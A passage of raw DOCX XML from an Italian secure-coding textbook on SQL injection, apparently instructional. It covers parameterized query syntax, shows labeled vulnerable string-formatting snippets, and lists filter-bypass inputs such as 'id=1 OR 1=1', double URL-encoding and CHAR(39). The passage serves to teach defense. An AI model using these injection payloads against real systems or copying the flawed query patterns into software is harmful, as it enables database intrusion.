      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel mondo cartaceo, una query parametrizzata è come un modulo prestampato che l’impiegato compila personalmente con le cifre giuste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dopo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aver letto le istruzioni del cittadino. Il cittadino può scrivere quello che vuole — l’impiegato non sostituisce mai la struttura del modulo, sostituisce solo i numeri nelle caselle. Anche se il cittadino scrive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rilascia un passaporto a chi presenta la domanda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’impiegato lo legge come una stringa di testo, non come un’istruzione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="227" w:name="sintassi-alternative-dei-parametri"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sintassi alternative dei parametri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A seconda del database e del driver Python, i placeholder hanno simboli diversi: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Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Driver Python tipico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlite3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(posizionale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">psycopg2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(posizionale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mysql-connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%s</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(posizionale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Microsoft SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pyodbc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(posizionale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esiste anche la sintassi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a nome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(per leggibilità con molti parametri):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"... WHERE id=:user_id AND email=:email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"user_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario@esempio.it"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Funzionalmente equivalente, più leggibile quando ci sono molti parametri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Errore comune di principiante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vedrai a volte questa scrittura, che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una query parametrizzata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE — usa solo l'operatore % di Python, non i placeholder!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM utenti WHERE id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user_id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">qui è l’operatore di formattazione delle stringhe di Python (uguale a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il placeholder del driver. Il risultato è ancora una concatenazione di stringhe, vulnerabile come prima. La differenza è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">secondo argomento di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: se passi i parametri lì dentro, sono parametri veri; se li hai già messi nella stringa, hai concatenato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="227"/>
    <w:bookmarkEnd w:id="228"/>
    <w:bookmarkStart w:id="233" w:name="X43d5744127ebeef38075fd4335559a34bcfc7d6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="sec_5_9"/>
      <w:r>
        <w:t xml:space="preserve">5.9 Perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filtrare gli apici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una pessima difesa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un programmatore alle prime armi capisce il problema della SQL Injection, spesso pensa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Facile! Filtro gli apici dall’input prima di metterli nella query.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ "DIFESA" SBAGLIATA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"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query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT * FROM utenti WHERE username='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non funziona.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per molte ragioni. Ne vediamo tre.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="229" w:name="bypass-1-input-numerico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypass 1: input numerico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se la query è su un campo numerico, gli apici non servono affatto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id_utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT * FROM utenti WHERE id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id_utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># nessun apice intorno al numero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante invia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1 OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ottiene tutti gli utenti, senza usare un solo apice. Filtrare gli apici qui non protegge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nulla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="229"/>
    <w:bookmarkStart w:id="230" w:name="bypass-2-doppia-codifica-e-unicode"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypass 2: doppia codifica e Unicode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Molti filtri controllano l’input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in chiaro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prima di una qualche fase di decodifica. Esempi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Doppia URL-encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%2527</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viene decodificato in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal primo passaggio, e in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal secondo. Se il filtro vede</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%2527</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non lo riconosce come apice e lo lascia passare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Caratteri Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">simili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: alcuni database accettano forme alternative dell’apice (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">U+2018</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">U+2019</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">U+02BC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">…) che sintatticamente equivalgono all’apice ASCII ma che un filtro ingenuo non rileva.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="230"/>
    <w:bookmarkStart w:id="231" w:name="bypass-3-sintassi-alternative-sql"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypass 3: sintassi alternative SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anche fingendo di filtrare ogni possibile apice, l’attaccante ha altre frecce. Esempi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Concatenazione di caratteri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHAR(39)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
